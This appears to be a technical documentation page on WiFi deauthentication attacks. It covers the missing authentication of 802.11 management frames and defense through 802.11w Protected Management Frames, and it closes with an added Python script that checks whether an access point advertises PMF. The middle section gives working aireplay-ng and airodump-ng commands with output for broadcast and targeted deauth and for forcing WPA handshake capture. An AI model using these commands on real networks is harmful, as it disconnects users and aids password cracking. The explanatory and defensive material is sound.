WiFi Attack
Deauth Attacks: WiFi Disconnection
Technical documentation on Deauthentication Attacks. Understand the attack technique and learn how to defend against it.
Deauthentication is a management frame in 802.11 — it's how an AP tells a client "please disconnect." It's also how a client tells an AP "I'm done here." The frame contains the BSSID (AP's MAC address), the client MAC address, and a reason code.
The original 802.11 specification did not require management frames to be encrypted or authenticated — they were considered "low risk." This means anyone can send a deauth frame to any client on the same channel, and the client must obey it. The client has no way to verify the frame actually came from its AP.
Why It Works: The Protocol Flaw
The 802.11 standard requires clients to honor deauth frames from any MAC address claiming to be their AP. There is no cryptographic verification that the frame actually originated from the legitimate AP. This was an oversight in the original 1997 specification that persists in most networks today because:
- Fixing it requires hardware and firmware updates on both APs and clients
- 802.11w (the amendment that added management frame protection) requires both ends to support it
- Many legacy devices don't support 802.11w and can't be updated
aireplay-ng Deauth Commands
```
$ # Broadcast deauth to ALL clients on the target AP
$ sudo aireplay-ng --deauth 0 -a DE:AD:BE:EF:00:01 wlan1mon
23:45:01 Sending DeAuth to broadcast -- BSSID: [DE:AD:BE:EF:00:01]
23:45:01 Sending DeAuth to broadcast -- BSSID: [DE:AD:BE:EF:00:01]
23:45:02 Sending DeAuth to broadcast -- BSSID: [DE:AD:BE:EF:00:01]
[Continuous deauth — all clients on channel 6 disconnected]

$ # Targeted deauth to a specific client MAC
$ sudo aireplay-ng --deauth 5 -a DE:AD:BE:EF:00:01 -c AA:BB:CC:DD:EE:FF wlan1mon
23:45:10 Sending DeAuth to [AA:BB:CC:DD:EE:FF] -- BSSID: [DE:AD:BE:EF:00:01]
23:45:10 Sending DeAuth to [AA:BB:CC:DD:EE:FF] -- BSSID: [DE:AD:BE:EF:00:01]
[5 deauth packets sent, then stops]
[Only this one device was disconnected]

$ # WPA handshake capture using deauth to force reconnection
$ # Run airodump first to capture the handshake
$ sudo airodump-ng wlan1mon --bssid DE:AD:BE:EF:00:01 -c 6 -w handshake_capture
$ # In another terminal, send deauth to force a fresh handshake
$ sudo aireplay-ng --deauth 5 -a DE:AD:BE:EF:00:01 wlan1mon
[Victim reconnects, handshake captured in airodump window]
```
Defense: 802.11w Protected Management Frames
802.11w-2009 (also called PMF, Protected Management Frames) adds authentication to management frames, including deauthentication and disassociation frames. When both the AP and the client support 802.11w, forged deauth frames are rejected.
- Enable 802.11w on your APs: Most enterprise APs support it, but it's often disabled by default
- Update legacy devices: Some older devices can't support 802.11w and may need to be replaced
- WPA3 requires 802.11w: Networks using WPA3-SAE have mandatory management frame protection
802.11w has been a standard for 17 years, but many networks — especially older enterprise deployments, ISP-provided routers, and IoT devices — don't have it enabled. Some devices that support 802.11w have bugs that cause them to disconnect excessively, leading IT departments to disable it. This is one of the most common gaps between "the attack is well-known" and "the fix hasn't been deployed."
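To check whether an AP actually advertises 802.11w rather than trusting its configuration page, the following added example (not part of the original page) parses the RSN element from a beacon's tagged parameters and reads the two management frame protection bits. The function names and the sample elements are constructed for illustration, and it assumes the tagged-parameter bytes have already been extracted from a capture.

```python
import struct

# RSN Capabilities bits in the RSN element (element ID 48) of a beacon
MFPR = 0x0040  # Management Frame Protection Required
MFPC = 0x0080  # Management Frame Protection Capable

def pmf_status(ies: bytes) -> str:
    """Classify PMF from the tagged elements of a beacon or probe response."""
    i = 0
    while i + 2 <= len(ies):
        eid, elen = ies[i], ies[i + 1]
        body = ies[i + 2:i + 2 + elen]
        i += 2 + elen
        if eid != 48:
            continue
        try:
            pos = 2 + 4                               # version, group cipher suite
            (n,) = struct.unpack_from("<H", body, pos)
            pos += 2 + 4 * n                          # pairwise cipher suite list
            (n,) = struct.unpack_from("<H", body, pos)
            pos += 2 + 4 * n                          # AKM suite list
            (caps,) = struct.unpack_from("<H", body, pos)
        except struct.error:
            return "unknown"    # RSN element ends before the capabilities field
        if caps & MFPR:
            return "required"   # clients without 802.11w cannot join
        if caps & MFPC:
            return "optional"   # clients that skip PMF still accept forged deauths
        return "disabled"
    return "no-rsn"             # no RSN element, so no PMF advertised

# Constructed sample elements (not captured traffic); sample_ies is a helper
# for this example only. Suite type 4 = CCMP, AKM 2 = PSK, AKM 8 = SAE.
def sample_ies(akms, caps):
    suite = lambda t: b"\x00\x0f\xac" + bytes([t])
    rsn = struct.pack("<H", 1) + suite(4) + struct.pack("<H", 1) + suite(4)
    rsn += struct.pack("<H", len(akms)) + b"".join(suite(a) for a in akms)
    rsn += struct.pack("<H", caps)
    return b"\x00\x04test" + bytes([48, len(rsn)]) + rsn

SAMPLES = {
    "wpa2-psk": sample_ies([2], 0x0000),
    "wpa2/wpa3 transition": sample_ies([2, 8], MFPC),
    "wpa3-sae": sample_ies([8], MFPR | MFPC),
    "open": b"\x00\x04test",
}

if __name__ == "__main__":
    for name, ies in SAMPLES.items():
        print(f"{name:22} PMF {pmf_status(ies)}")
```

An AP reporting "optional" protects only the clients that negotiate PMF; legacy clients on the same network remain exposed to forged deauth frames.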